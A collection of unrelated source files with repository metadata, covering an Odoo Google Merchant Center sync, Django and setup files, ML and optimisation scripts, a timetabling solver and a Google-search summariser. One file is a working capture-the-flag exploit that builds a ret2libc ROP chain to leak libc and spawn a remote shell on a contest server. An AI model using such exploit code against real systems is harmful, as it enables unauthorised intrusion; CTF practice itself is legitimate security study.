redirect_uri = web_base_url + '/google_content/authentication'
# Get the Refresh Token From Google And store it in ir.config_parameter
headers = {"Content-type": "application/x-www-form-urlencoded"}
data = {
'code': authorization_code,
'client_id': client_id,
'client_secret': client_secret,
'redirect_uri': redirect_uri,
'grant_type': "authorization_code"
}
try:
req = requests.post(GOOGLE_TOKEN_ENDPOINT, data=data, headers=headers, timeout=TIMEOUT)
req.raise_for_status()
content = req.json()
except IOError:
error_msg = _("Something went wrong during your token generation. Maybe your Authorization Code is invalid or already expired")
raise self.env['res.config.settings'].get_config_warning(error_msg)
return content.get('access_token')
#ACS: Copy from google account
@api.model
def get_access_token(self, scope=None):
Config = self.env['ir.config_parameter'].sudo()
google_content_refresh_token = Config.get_param('google_content_refresh_token')
user_is_admin = self.env.is_admin()
if not google_content_refresh_token:
raise UserError(_("Google Shopping API is not yet configured. Please contact your administrator."))
google_content_client_id = Config.get_param('google_content_client_id')
google_content_client_secret = Config.get_param('google_content_client_secret')
#For Getting New Access Token With help of old Refresh Token
data = {
'client_id': google_content_client_id,
'refresh_token': google_content_refresh_token,
'client_secret': google_content_client_secret,
'grant_type': "refresh_token",
'scope': scope or 'https://www.googleapis.com/auth/content'
}
headers = {"Content-type": "application/x-www-form-urlencoded"}
try:
req = requests.post(GOOGLE_TOKEN_ENDPOINT, data=data, headers=headers, timeout=TIMEOUT)
req.raise_for_status()
except requests.HTTPError:
if user_is_admin:
dummy, action_id = self.env['ir.model.data'].get_object_reference('base_setup', 'action_general_configuration')
msg = _("Something went wrong during the token generation. Please request again an authorization code .")
raise RedirectWarning(msg, action_id, _('Go to the configuration panel'))
else:
raise UserError(_("Google Shopping API is not yet configured. Please contact your administrator."))
return req.json().get('access_token')
def sync_product_with_gmc(self, products):
""" Update products on Google merchant center
Param: Products: browse list of records for product.product
"""
def get_names(cat):
""" Return the list [cat.name, cat.parent_id.name, ...] """
res = []
while cat:
res.append(cat.name)
cat = cat.parent_id
return res
currency = self.env.user.company_id.currency_id.name
count = 1
for product in products:
#Display ads id
if product.google_display_ads_id:
displayAdsId = product.google_display_ads_id
else:
displayAdsId = 'ADS%s' % get_unique_id()
product.write({'google_display_ads_id': displayAdsId})
product_data = {
'displayAdsId': displayAdsId,
'title': product.name,
'description': product.description_sale,
#Use product template url as variants are not shown sepratly.
'link': product.google_merchant_center_id.website + "/shop/product/%s" % (product.product_tmpl_id.id,),
'imageLink': product.google_merchant_center_id.website + '/web/image/%s/%s/%s/image.jpg' % ('product.template', product.product_tmpl_id.id, 'image_1024'),
#Note: Instead of passing website url passsed backend URl because Store not accept image without type
'contentLanguage': product.google_content_language,
'targetCountry': product.google_target_country,
'channel': product.google_channel,
'availability': product.google_availability,
'condition': product.google_condition,
'googleProductCategory': " > ".join(reversed(get_names(product.google_product_category_id))),
'productTypes': [" > ".join(reversed(get_names(product.categ_id)))],
'brand': product.google_product_brand_id and product.google_product_brand_id.name or '',
'price': {
'value': product.gmc_list_price,
'currency': currency},
'shipping': [{
'country': product.google_target_country,
'service': product.google_shipping,
'price': {'value': product.google_shipping_amount,
'currency': currency}
}],
'shippingWeight': {
'value': product.weight * 1000,
'unit': 'grams'
},
}
if product.google_mcid:
product_data.pop('targetCountry')
product_data.pop('contentLanguage')
product_data.pop('channel')
else:
offerId = 'CM%s' % get_unique_id()
product_data.update({'offerId': offerId, 'id': offerId})
#Check if identifierExists than only add mpn
if product.google_identifier_exists:
if not product.google_barcode_as_gtin and product.google_gtin:
product_data.update({'gtin': product.google_gtin})
elif product.google_barcode_as_gtin and product.barcode:
product_data.update({'gtin': product.barcode})
if product.google_default_code_as_mpn:
product_data.update({'mpn': product.default_code})
else:
product_data.update({'identifier_exists': 'no'})
#add some optional attributes
if product.google_gender:
product_data.update({'gender': product.google_gender})
if product.google_age_group:
product_data.update({'ageGroup': product.google_age_group})
if product.google_product_size_id:
product_data.update({'sizes': [product.google_product_size_id and product.google_product_size_id.name or '']})
if product.google_product_color_id:
product_data.update({'color': product.google_product_color_id and product.google_product_color_id.name or '',})
if product.google_expiration_date:
#pass date in perticular formate
expiration_date = product.google_expiration_date.strftime('%Y-%m-%d')
product_data.update({'expirationDate': expiration_date})
#Optionla Attributes for Remarketing
if product.google_display_ads_similar_ids:
product_data.update({'displayAdsSimilarIds': [prod.google_display_ads_id for prod in product.google_display_ads_similar_ids]})
if product.google_display_ads_title:
product_data.update({'displayAdsTitle': product.google_display_ads_title})
if product.google_display_ads_link:
product_data.update({'displayAdsLink': product.google_display_ads_link})
if product.google_display_ads_value:
product_data.update({'displayAdsValue': product.google_display_ads_value})
if product.google_excluded_destination:
product_data.update({'destinations': {
'destinationName': 'DisplayAds',
'intention': 'excluded'}
})
token = self.get_access_token()
jason_data_set = json.dumps(product_data)
if product.google_mcid:
mc_product_id = product.google_channel + ':' + product.google_content_language + ':' + product.google_target_country+ ':' + product.google_mcid
url = "https://shoppingcontent.googleapis.com/content/v2.1/%s/products/%s" % (product.google_merchant_center_id.name, mc_product_id)
reqreply = requests.patch(url, jason_data_set, headers={'accept': 'application/json', 'Content-Type': 'application/json', 'Authorization': 'Bearer %s' % (token)})
else:
url = "https://shoppingcontent.googleapis.com/content/v2.1/%s/products" % product.google_merchant_center_id.name
reqreply = requests.post(url, jason_data_set, headers={'accept': 'application/json', 'Content-Type': 'application/json', 'Authorization': 'Bearer %s' % (token)})
reqreply_text = json.loads(reqreply.text)
if reqreply.status_code!=200:
product.gmc_lisitng_response = json.loads(reqreply.text)
if reqreply.status_code==200:
if product.google_mcid:
product.write({'google_sync_date': fields.Date.today()})
else:
product.write({'google_mcid': offerId, 'google_sync_date': fields.Date.today()})
def sync_products_with_gmc(self) :
"""Sync New products which is still not synced on center"""
products = self.env['product.product'].search([('sync_with_mc','=',True), ('website_published','=',True), ('google_product_brand_id','!=',False), ('google_merchant_center_id','!=',False),('google_mcid','=',False)])
_logger.info('Total products to be synced------ %s', len(products))
self.sync_product_with_gmc(products)
def re_sync_products_with_gmc(self) :
"""Re Sync all products"""
products = self.env['product.product'].search([('sync_with_mc','=',True), ('google_mcid','!=',False)], order='google_sync_date asc')
_logger.info('Total products to be synced------ %s', len(products))
self.sync_product_with_gmc(products)
def delete_product_from_gmc(self, products):
""" Delete products on Google merchant center
Param: Products: browse list of records for product.product
"""
for product in products:
if product.google_mcid:
mc_product_id = product.google_channel + ':' + product.google_content_language + ':' + product.google_target_country+ ':' + product.google_mcid
token = self.get_access_token()
_logger.info('Product------- %s',product)
url = "https://shoppingcontent.googleapis.com/content/v2.1/%s/products/%s" % (product.google_merchant_center_id.name, mc_product_id)
reqreply = requests.delete(url, headers={'accept': 'application/json', 'Content-Type': 'application/json', 'Authorization': 'Bearer %s' % (token)})
if reqreply.status_code==200:
product.google_mcid = ''
self.env.cr.commit()
if reqreply.status_code!=200:
try:
product.gmc_lisitng_response = json.loads(reqreply.text)
except:
pass
def delete_products_from_gmc(self) :
"""Delete all products"""
products = self.env['product.product'].search([('sync_with_mc','=',True), ('google_mcid','!=',False)])
self.delete_product_from_gmc(products)
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4: | pman-jvm/totaltools-v15 | website_google_merchant_center/models/google_merchant_center.py | google_merchant_center.py | py | 14,207 | python | en | code | 0 | github-code | 50 |
14268944897 | from django.urls import path
from api.views.film import FilmRetrieveUpdateAPIView, FilmListAPIView
app_name = 'film'
urlpatterns = [
path('<int:id>/', FilmRetrieveUpdateAPIView.as_view(), name='film-detail'),
path('list/', FilmListAPIView.as_view(), name='film-list')
]
| Eugen1y/Cinema | api/urls/film.py | film.py | py | 282 | python | en | code | 0 | github-code | 50 |
9642440681 | from pathlib import Path
import setuptools
this_directory = Path(__file__).parent
long_description = (this_directory / "README.md").read_text()
setuptools.setup(
name="streamlit-camera-input-live",
version="0.2.0",
author="Zachary Blackwood",
author_email="zachary@streamlit.io",
description="Alternative version of st.camera_input which returns the webcam images live, without any button press needed",
long_description=long_description,
long_description_content_type="text/markdown",
packages=setuptools.find_packages(where="src"),
package_dir={"": "src"},
include_package_data=True,
classifiers=[],
python_requires=">=3.7",
install_requires=["streamlit>=1.2", "jinja2"],
url="https://github.com/blackary/streamlit-camera-input-live",
)
| blackary/streamlit-camera-input-live | setup.py | setup.py | py | 798 | python | en | code | 13 | github-code | 50 |
23476658762 | #모범답안
import heapq
def solution(food_times, k):
if k >= sum(food_times):
return -1
#시간이 적은 음식부터 빼야 하므로 순서대로 정렬
q = []
for i in range(len(food_times)):
#(음식시간, 음식번호)형태로 우선순위 큐에 삽입
heapq.heappush(q, (food_times[i], i+1))
sum_value = 0#먹기위해 사용한 시간
previous = 0#직전에 다먹은 시간
lenth = len(food_times)#남은 음식의 갯수
#sum_value + (현재의 음식 시간 - 이전 음식 시간) * 현재 음식의 갯수 k와 비교
while sum_value + ((q[0][0] - previous) * lenth) <= k:
now= heapq.heappop(q)[0]
sum_value += (now - previous) * lenth
lenth -= 1
previous = now
result = sorted(q, key = lambda x:x[1]) #움식의 번호 기준으로 정렬
return result[(k-sum_value) % lenth][1]
print(solution([3,1,2,5], 5)) | Gyeony95/Algorithm-Solution | 2020-09/프로그래머스/프로그래머스_카카오_무지의 먹방 라이브2.py | 프로그래머스_카카오_무지의 먹방 라이브2.py | py | 934 | python | ko | code | 0 | github-code | 50 |
19492639639 | from flow.el.elCable import ElCable
class SinglePhaseMvCable(ElCable):
def __init__(self, name, flowSim, nodeFrom, nodeTo, host, connectedPhase=0):
ElCable.__init__(self, name, flowSim, nodeFrom, nodeTo, host)
self.devtype = "ElectricitySinglePhaseMediumVoltageCable"
self.hasNeutral = True
self.phases = 1
# Specific to US grids, we need to indicate which phase is connected on the three phase system
self.connectecPhase = connectedPhase
# bookkeeping
self.current = [complex(0.0, 0.0)] * (self.phases+1)
self.flowDirection = [1] * (self.phases+1)
self.length = None # in meters
self.ampacity = None # amperes
self.fuse = 0 # additional limit
self.enabled = True # Option to disable the cable.
self.burned = False
self.powered = [True] * (self.phases+1) # Option to indicate the cable is powered, in case of a fault towards the transformer
# The following values are and example
self.impedance = [complex(0.049113, 0.71673), complex(0.1754399, 0.80535)]
| utwente-energy/demkit | components/flow/el/singlePhaseMvCable.py | singlePhaseMvCable.py | py | 1,005 | python | en | code | 11 | github-code | 50 |
23349911421 | import boto3
region = 'us-east-1'
tagvalue = 'mbiii'
lstinstance = list(())
ec2 = boto3.client('ec2', region_name=region)
def lambda_handler(event, context):
response = ec2.describe_instances(
Filters=[
{
'Name': 'tag:usecase',
'Values': [tagvalue]
}
]
)
for reservation in response["Reservations"]:
for instance in reservation["Instances"]:
# This sample print will output entire Dictionary object
#print(instance)
# This will print will output the value of the Dictionary key 'InstanceId'
instancerunning = instance["InstanceId"]
lstinstance.append(instancerunning)
print(instance["InstanceId"])
return {
'instances' : lstinstance
}
| ratokeshi/aws-lambda-ec2-instance-control | instanceec2list.py | instanceec2list.py | py | 841 | python | en | code | 0 | github-code | 50 |
28491020588 | import tensorflow as tf
def text_conv(embedding_input,filter_size,filter_num,var_scope=None,pooling_method='max',mode='train',dropout_rate=None):
with tf.variable_scope(var_scope or 'text_conv',reuse=tf.AUTO_REUSE):
embedding_input=tf.cast(embedding_input,dtype=tf.float32,name='change_float')
conv=tf.layers.conv1d(embedding_input,filter_num,filter_size)
if mode=='train':
conv=tf.nn.dropout(conv,keep_prob=1-dropout_rate,name='conv_dropout')
if pooling_method=='max':
output=tf.reduce_max(conv,reduction_indices=[1],name='global_pooling')
elif pooling_method=='mean':
output=tf.reduce_mean(conv,reduction_indices=[1],name='global_mean')
else:
output=tf.reduce_all(conv,reduction_indices=[1],name='global_all')
return output | DDigimon/NLPDemo | ModelLayers/ConvLayer.py | ConvLayer.py | py | 834 | python | en | code | 1 | github-code | 50 |
4106942657 | from datasets import MedicalDataset
from tqdm import tqdm
class ToyDataset(MedicalDataset):
def __getitem__(self, idx):
return self.get_sample(idx)
if __name__ == "__main__":
import matplotlib.pyplot as plt
import numpy as np
from scipy.ndimage.morphology import binary_dilation, distance_transform_edt
from visualisation import show_organs, show_dose_organs, show_sample, show_array
train_dir = "challenge_data/validation/validation"
train_dataset = ToyDataset(train_dir)
sample = next(iter(train_dataset))
mean_ct = 0
std_ct = 0
for sample in tqdm(train_dataset):
ct = sample["ct"]
possible_dose_mask = sample["possible_dose_mask"]
structure_masks = sample["structure_masks"]
dose = sample["dose"]
all_mask = sample["all_structure_mask"]
mean_ct += structure_masks.mean()
std_ct += structure_masks.std()
# output = distance_transform_edt(binary_dilation(all_mask, iterations=20))
print(mean_ct/len(train_dataset))
print(std_ct/len(train_dataset))
# output /= output.max()
# output[all_mask == 1] = 1
# output = np.multiply(output, possible_dose_mask)
# # output = 80*output
# show_array(output)
# # output += output.mean() * np.multiply(1-all_mask, possible_dose_mask)
# keys = ["ct", "possible_dose_mask", "dose"]
# structure_masks = sum([0.1*i*organ for i, organ in enumerate(sample["structure_masks"])])
# plt.figure()
# for i, key in enumerate(keys):
# plt.subplot(1, 5, i+1)
# plt.imshow(sample[key])
# plt.subplot(1, 5, 4)
# plt.imshow(structure_masks)
# plt.subplot(1, 5, 5)
# plt.imshow(output)
# plt.show()
# show_array(output)
# show_organs(sample)
# show_dose_organs(sample)
# show_sample(sample)
# print(sample["organ_dose"].shape)
# break
# print(dose[dose != 0.].min())
# print(dose[dose != 0.].max())
# print(dose[dose != 0.].mean())
# print(dose[dose != 0.].std())
| ubar667/radiotherapy_dose_prediction_kaggle | datasets/toy_dataset.py | toy_dataset.py | py | 2,171 | python | en | code | 0 | github-code | 50 |
15252893093 | #!/usr/bin/env python3
from pwn import *
binary = context.binary = ELF('./one_piece')
context.log_level = 'INFO'
context.log_file = 'log.log'
'''
# local libc
libc = binary.libc
p = process(binary.path)
'''
# task libc
libid = 'libc6_2.30-0ubuntu2.2_amd64'
libpath = os.getcwd() + '/libc-database/libs/' + libid + '/'
ld = ELF(libpath + 'ld-2.30.so')
libc = ELF(libpath + 'libc-2.30.so')
#p = process([ld.path, binary.path], env={'LD_LIBRARY_PATH': libpath})
p = remote('onepiece.fword.wtf', 1238)
#'''
p.recvuntil('(menu)>>')
p.sendline('read')
p.recvuntil('>>')
p.send('y' * 0x27 + 'z')
p.recvuntil('>>')
p.sendline('gomugomunomi')
p.recvuntil('Luffy is amazing, right ? : ')
_ = p.recvline().strip()
mugiwara = (int(_,16) & (2**64 - 0x1000)) + binary.sym.mugiwara
log.info('mugiwara: ' + hex(mugiwara))
binary.address = mugiwara - binary.sym.mugiwara
log.info('binary.address: ' + hex(binary.address))
p.recvuntil('Wanna tell Luffy something ? : \n')
rop = ROP([binary])
pop_rdi = rop.find_gadget(['pop rdi','ret'])[0]
log.info('pop_rdi: ' + hex(pop_rdi))
payload = 0x38 * b'A'
payload += p64(pop_rdi)
payload += p64(binary.got.puts)
payload += p64(binary.plt.puts)
payload += p64(binary.sym.choice)
p.sendline(payload)
_ = p.recv(6)
puts = u64(_ + b'\x00\x00')
log.info('puts: ' + hex(puts))
libc.address = puts - libc.sym.puts
log.info('libc.address: ' + hex(libc.address))
p.recvuntil('>>')
p.sendline('gomugomunomi')
p.recvuntil('Wanna tell Luffy something ? : \n')
payload = 0x38 * b'A'
payload += p64(pop_rdi + 1)
payload += p64(pop_rdi)
payload += p64(libc.search(b"/bin/sh").__next__())
payload += p64(libc.sym.system)
p.sendline(payload)
p.interactive()
| datajerk/ctf-write-ups | fwordctf2020/one_piece/exploit.py | exploit.py | py | 1,680 | python | en | code | 116 | github-code | 50 |
21923686793 | import time
from helpers import *
from enums import *
from preprocess import *
from solution import *
import math
"""
Process method -
This method contains the main instance processing and modeling logic
"""
def process(data):
if not data: return None
courses, periods, \
slots_per_day, teachers, \
constraints, rooms, curricula, \
primary_primary_distance = \
pluck(data,
'Courses', 'Periods', 'SlotsPerDay',
'Teachers', 'Constraints', 'Rooms',
'Curricula', 'PrimaryPrimaryDistance'
)
periods = list(range(0, periods))
hard_constraints = list(filter(lambda val: val['Level'] == 'Forbidden', constraints))
period_constraints = list(filter(lambda val: val['Type'] == 'PeriodConstraint', hard_constraints))
event_period_constraints = list(filter(lambda val: val['Type'] == 'EventPeriodConstraint', hard_constraints))
event_room_constraints = list(filter(lambda val: val['Type'] == 'EventRoomConstraint', hard_constraints))
periods = sieve_periods(periods, period_constraints)
courses = flat_map_courses(courses)
courses = add_possible_rooms(courses, rooms, event_room_constraints)
courses = add_possible_periods(courses, periods, event_period_constraints)
courses = add_curricula_info(courses, curricula, primary_primary_distance, slots_per_day)
courses = add_same_teacher_courses(courses)
courses = order_course_by_constraints(courses)
courses = group_by_exams_and_parts(courses)
# courses = group_by_course(courses)
return courses, hard_constraints, constraints
"""
Run a greedy search -
This section contains the main logic to run a greedy search from
the initial solution by mutation operators
"""
def greedy_search(instances, hard_constraints, instance_path, constraints, attempts = 2500):
solution = Solution.try_solving(instances, hard_constraints, instance_path=instance_path, constraints=constraints)
best_cost = float('inf')
last_solution = solution
for i in range(0, attempts):
mutated_solution = Solution.try_mutating(last_solution)
if (mutated_solution == None): continue
# save_solution(instance_path, mutated_solution.export(), True)
if (mutated_solution.cost < best_cost):
best_cost = mutated_solution.cost
last_solution = mutated_solution
if i % 10 == 0:
last_solution.validate()
print(best_cost, last_solution.validation_results['cost'], last_solution.validation_results['valid'])
"""
Run a simluated annealing search -
This section contains the main logic to run a simluated annealing search from
the initial solution by mutation operators
"""
def sim_annealing(
instances,
hard_constraints,
instance_path,
constraints,
maxsteps=1000,
debug=False
):
def acceptance_probability(cost, new_cost, temperature):
if new_cost < cost:
return 1
else:
p = math.exp(- (new_cost - cost) / temperature)
return p
def temperature(fraction):
return max(0.01, min(1, 1 - fraction))
state = Solution.try_solving(instances, hard_constraints, instance_path=instance_path, constraints=constraints)
cost = state.cost
states, costs = [state], [cost]
for step in range(maxsteps):
fraction = step / float(maxsteps)
T = temperature(fraction)
new_state = Solution.try_mutating(state)
new_cost = new_state.cost
if debug: print("Step #{:>2}/{:>2} : T = {:>4.3g}, cost = {:>4.3g}, new_cost = {:>4.3g} ...".format(step, maxsteps, T, cost, new_cost))
if acceptance_probability(cost, new_cost, T) > random.random():
state, cost = new_state, new_cost
states.append(state)
costs.append(cost)
if step % 10 == 0:
state.validate()
print(state.cost, state.validation_results['cost'], state.validation_results['valid'])
return state
"""
Run hill climbing search -
This section contains the main logic to run a hill climbing search from
the initial solution by mutation operators
"""
def hillclimbing(instances, hard_constraints, instance_path, constraints, old_solution=None):
def get_best_neighbour(solution):
best_cost = solution.cost
best_solution = solution
for i in range(0, 15):
mutated_solution = Solution.try_mutating(best_solution)
if (mutated_solution == None): continue
if (mutated_solution.cost < best_cost):
best_cost = mutated_solution.cost
best_solution = mutated_solution
return best_solution
if old_solution == None:
solution = Solution.try_solving(instances, hard_constraints, instance_path=instance_path, constraints=constraints)
else:
solution = old_solution
neighbour = get_best_neighbour(solution)
last_solution = solution
while neighbour.cost < solution.cost:
solution = neighbour
neighbour = get_best_neighbour(neighbour)
return solution
"""
Run an interated local search -
This section contains the main logic to run an interated local search from
the initial solution by mutation operators
"""
def iterated_local_search(
instances,
hard_constraints,
instance_path,
constraints,
iterations=350,
):
best_solution = hillclimbing(instances, hard_constraints, instance_path, constraints, None)
best_solutions = []
for n in range(iterations):
mutated_solution = None
while mutated_solution == None:
mutated_solution = Solution.try_mutating(best_solution)
local_solution = hillclimbing(None, None, None, None, mutated_solution)
if local_solution.cost < best_solution.cost:
best_solution = local_solution
best_solutions.append(best_solution)
if n % 3 == 0:
best_solution.validate()
print(best_solution.cost, best_solution.validation_results['cost'], best_solution.validation_results['valid'])
return best_solution
def test_evaluation(solution):
solution.validate()
base_cost = solution.cost
validator_cost = solution.validation_results['cost']
if (base_cost != validator_cost):
print("FALSE EVALUATION", base_cost, validator_cost, abs(base_cost - validator_cost))
else:
print("TRUE EVALUATION", base_cost, validator_cost, abs(base_cost - validator_cost))
"""
Solve one instance -
This section contains the main logic to solve one instance
"""
def run_solver(instance_path):
start_time = time.time()
tprint("Running solver on instance:", instance_path)
data = parse(instance_path)
instances, hard_constraints, constraints = process(data)
# save_file("preprocess.json", instances, ".")
solution = Solution.try_solving(instances, hard_constraints, instance_path=instance_path, constraints=constraints)
save_solution(instance_path, solution.export())
end_time = time.time()
tprint("Solver completed. Check solutions folder.")
tprint(f"Completed in {end_time-start_time:.2f}s.")
iterated_local_search(instances, hard_constraints, instance_path=instance_path, constraints=constraints)
# hillclimbing(instances, hard_constraints, instance_path=instance_path, constraints=constraints)
# greedy_search(instances, hard_constraints, instance_path=instance_path, constraints=constraints)
# sim_annealing(instances, hard_constraints, instance_path=instance_path, constraints=constraints)
"""
Solve all instances -
This section contains the main logic to solve all instances,
which are present in the instances folder
"""
def solve_all_instances(folder = 'instances'):
for _, _, files in os.walk(folder):
print("Solving all instances.")
for filename in files: run_solver(f'{folder}/{filename}')
"""
Main program -
This section runs the solver
"""
def main():
if solve_all_arg(): solve_all_instances()
else: run_solver(get_filepath())
"""
Execution
"""
if __name__ == '__main__':
main()
| SynimSelimi/examination-timetabling | src/__main__.py | __main__.py | py | 8,115 | python | en | code | 1 | github-code | 50 |
26245664178 | import asyncio
import re
import requests
import openai
from bs4 import BeautifulSoup
from googleapiclient.discovery import build
from logger import setup_logger
from keys import OPENAI_KEY, GOOGLE_SEARCH_API, GOOGLE_SEARCH_ID
# Set up logger
logger = setup_logger('google_interests')
# Set up OpenAI API
openai.api_key = OPENAI_KEY
def google_search(query, api_key, cse_id, **kwargs):
'''Perform Google search and return results'''
service = build("customsearch", "v1", developerKey=api_key)
res = service.cse().list(q=query, cx=cse_id, **kwargs).execute()
if 'items' in res:
return res['items']
else:
logger.error(
"Google Search response did not contain 'items'. return None.")
return None
def clean_data(data):
'''Clean up the data (remove new lines and trim whitespaces)'''
return [i.replace('\n', ' ').strip() for i in data]
def get_content(url):
'''Function to scrape and return contents from a specific URL'''
try:
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.82 Safari/537.36'
}
page = requests.get(url, headers=headers)
if page.status_code == 200 and "cloudflare" not in page.text.lower() and "twitter.com" not in url:
# Extract and clean content from specific tags
soup = BeautifulSoup(page.content, 'html.parser')
tags = ['h1', 'h2', 'p', 'a', 'div']
contents = {tag: clean_data(
[i.text for i in soup.find_all(tag)]) for tag in tags}
return contents
else:
logger.warning(f"Could not scrape content from {url}.")
return None
except Exception as e:
logger.error(f"An error occurred: {e}")
return None
async def get_most_relevant_link_from_GPT_non_blocking(system_message, n=0):
'''Non-blocking version of function to get relevant link from GPT'''
loop = asyncio.get_event_loop()
task = loop.create_task(get_most_relevant_link_from_GPT(system_message))
return await task
async def get_most_relevant_link_from_GPT(system_message, n=0):
'''Function to get the most relevant link from GPT based on system message'''
messages = [
{"role": "system", "content": system_message}
]
try:
response_data = openai.ChatCompletion.create(
model="gpt-3.5-turbo",
messages=messages,
max_tokens=200,
temperature=0.4
)
return response_data.choices[0].message['content'].strip().strip('.').strip('"')
except Exception as e:
logger.error(f"An error occurred: {e}")
return None
async def summarize_google(user_input, user_profile, last_3_conversations):
'''Main function to summarize news based on user input, profile, and conversation history'''
api_key = GOOGLE_SEARCH_API
cse_id = GOOGLE_SEARCH_ID
system_message = f"Aisha, as an AI, you are about to decide what overall sentence to Google for the user. Considering the latest text message from the user: \"{user_input}\", the last 6 conversations: \"{last_3_conversations}\" and the user profile: \"{user_profile}\"\nWhat is the most relevant short google search, that most likely will have results, to continue this conversation? Google Search:"
query = await get_most_relevant_link_from_GPT_non_blocking(system_message)
logger.info(f"Query: {query}")
# Perform Google search and process the results
results = google_search(query, api_key, cse_id, num=9)
if results is None:
logger.error("No results from Google Search.")
return "No results from Google Search.", None
url_titles = [f"{i}. {result['title']}" for i,
result in enumerate(results)]
logger.info(f"url_titles: {url_titles}")
# Prepare prompt for GPT
system_message = f"This is a list of the top 9 google search results for the query '{query}':\n"
system_message += '\n'.join(url_titles)
system_message += f"\nWhat is the one most relevant, amusing, and interesting news title number for the query '{query}', answer with only the number. \nNumber: "
most_relevant_url = await get_most_relevant_link_from_GPT_non_blocking(system_message)
# Using the number from the AI response, get the URL link from the results list
try:
most_relevant_url = re.match(r'^(\d+)', most_relevant_url).group()
except:
most_relevant_url = 1
most_relevant_url = results[int(most_relevant_url)]["link"]
logger.info(f"Most relevant URL (Google Search): {most_relevant_url}")
content = get_content(most_relevant_url)
# If the content is None, try all other URLs in the results
if content is None:
for i in range(len(results)):
# Skip the URL that we've already tried
if results[i]["link"] == most_relevant_url:
continue
logger.debug("CONTENT IS NONE, MOVING TO LINK: %s", i)
content = get_content(results[i]["link"])
if content is not None:
most_relevant_url = results[i]["link"]
break
# If all URLs returned None (all were blocked or were twitter links), then return a message
if content is None:
logger.error(
"All URLs were either blocked for scraping or were twitter links.\n")
return "Could not fetch news. Please try again later.", None
information = "\n".join(
[f"{k}: {str(v)[:400]}" for k, v in content.items()])
# Ask GPT to summarize the information
system_message = f"Extract and summarize only news about \"{query}\" with dates from the URL: {most_relevant_url}\nInformation:\n{information}\nSummary:"
summary = await get_most_relevant_link_from_GPT_non_blocking(
system_message) # + f" [Link: {most_relevant_url}]"
logger.info(f"Summary: {summary}")
return summary, most_relevant_url
if __name__ == '__main__':
# Simple Test
asyncio.run(summarize_google("Zoe Support",
"Likes playing LOL", "I like playing LOL"))
| kpister/prompt-linter | data/scraping/repos/dimitri-sky~Aisha-AI-Demo/google_interests.py | google_interests.py | py | 6,158 | python | en | code | 0 | github-code | 50 |
16456969342 | import argparse
import copy
import hypergrad as hg # hypergrad package
import math
import numpy as np
import os
import time
import torch
import torch.nn as nn
import torch.nn.functional as F
import torchvision.transforms as transforms
from torchvision import datasets
################################################################################
#
# Bilevel Optimization
#
# min_{x,w} f(x, w)
# s.t. x = argmin_x g(x, w)
#
# here: f(x, w) is on valset
# g(x, w) is on trainset
#
# f_x = df/dx
# f_w = df/dw
# g_x = dg/dx
# g_w = dg/dw
#
################################################################################
METHODS = [
'F2BA',
'AID',
'ITD'
]
def parse_args():
parser = argparse.ArgumentParser()
parser.add_argument('--dataset', type=str, default="mnist", choices=["mnist", "fashion"])
parser.add_argument('--train_size', type=int, default=50000)
parser.add_argument('--val_size', type=int, default=10000)
parser.add_argument('--pretrain', type=int, default=0, choices=[0,1], help='whether to create data and pretrain on valset')
parser.add_argument('--epochs', type=int, default=5000)
parser.add_argument('--iterations', type=int, default=10, help='T')
parser.add_argument('--K', type=int, default=10, help='k')
parser.add_argument('--data_path', default='~/Data', help='where to save data')
parser.add_argument('--model_path', default='./save_data_cleaning', help='where to save model')
parser.add_argument('--noise_rate', type=float, default=0.5)
parser.add_argument('--x_lr', type=float, default=0.01)
parser.add_argument('--xhat_lr', type=float, default=0.01)
parser.add_argument('--w_lr', type=float, default=100)
parser.add_argument('--seed', type=int, default=1)
parser.add_argument('--alg', type=str, default='F2BA', choices=METHODS)
parser.add_argument('--lmbd', type=float, default=10.0)
args = parser.parse_args()
np.random.seed(args.seed)
torch.manual_seed(args.seed)
return args
def get_data(args):
data = {
'mnist': datasets.MNIST,
'fashion': datasets.FashionMNIST,
}
trainset = data[args.dataset](root=args.data_path,
train=True,
download=False)
testset = data[args.dataset](root=args.data_path,
train=False,
download=False)
indices = torch.randperm(len(trainset))
train_x = trainset.data[indices[:args.train_size]] / 255.
val_x = trainset.data[indices[args.train_size:args.train_size+args.val_size]] / 255.
test_x = testset.data / 255.
targets = trainset.targets if args.dataset in ["mnist", "fashion"] else torch.LongTensor(trainset.targets)
train_y = targets[indices[:args.train_size]]
val_y = targets[indices[args.train_size:args.train_size+args.val_size]]
test_y = torch.LongTensor(testset.targets)
num_classes = test_y.unique().shape[0]
assert val_y.unique().shape[0] == num_classes
### poison training data with noise rate = args.noise_rate
num_noisy = int(args.train_size * args.noise_rate)
rand_indices = torch.randperm(args.train_size)
noisy_indices = rand_indices[:num_noisy]
noisy_y = torch.randint(num_classes, size=(num_noisy,))
old_train_y = train_y.data.clone()
train_y.data[noisy_indices] = noisy_y.data
# normalizing inputs to mean 0 and std 1.
mean = train_x.unsqueeze(1).mean([0,2,3])
std = train_x.unsqueeze(1).std([0,2,3])
trainset = ( torch.flatten((train_x - mean)/(std+1e-4), start_dim=1), train_y )
valset = ( torch.flatten((val_x - mean)/(std+1e-4), start_dim=1), val_y )
testset = ( torch.flatten((test_x - mean)/(std+1e-4), start_dim=1), test_y )
return trainset, valset, testset, old_train_y
### initialize a linear model
def get_model(in_features, out_features, device):
x = torch.zeros(out_features, in_features+1, requires_grad=True, device=device)
weight = torch.empty((out_features, in_features))
bias = torch.empty(out_features)
nn.init.kaiming_uniform_(weight, a=math.sqrt(5))
fan_in, _ = nn.init._calculate_fan_in_and_fan_out(weight)
bound = 1 / math.sqrt(fan_in) if fan_in > 0 else 0
nn.init.uniform_(bias, -bound, bound)
x[:,:in_features].data.copy_(weight.clone().to(device))
x[:, -1].data.copy_(bias.clone().to(device))
return x
def model_forward(x, inputs):
in_features = 28*28
A = x[:,:in_features] # (out_features, in_features)
b = x[:,-1] # (out_features,)
y = inputs.mm(A.t()) + b.view(1,-1)
return y
### original f, g, and gradients
def f(x, w, dataset):
data_x, data_y = dataset
y = model_forward(x, data_x)
loss = F.cross_entropy(y, data_y)
return loss
def g(x, w, dataset):
data_x, data_y = dataset
y = model_forward(x, data_x)
loss = F.cross_entropy(y, data_y, reduction='none')
loss = (loss * torch.clip(w, 0, 1)).mean() + 0.001 * x.norm(2).pow(2)
return loss
def g_x(x, w, dataset, retain_graph=False, create_graph=False):
loss = g(x, w, dataset)
grad = torch.autograd.grad(loss, x,
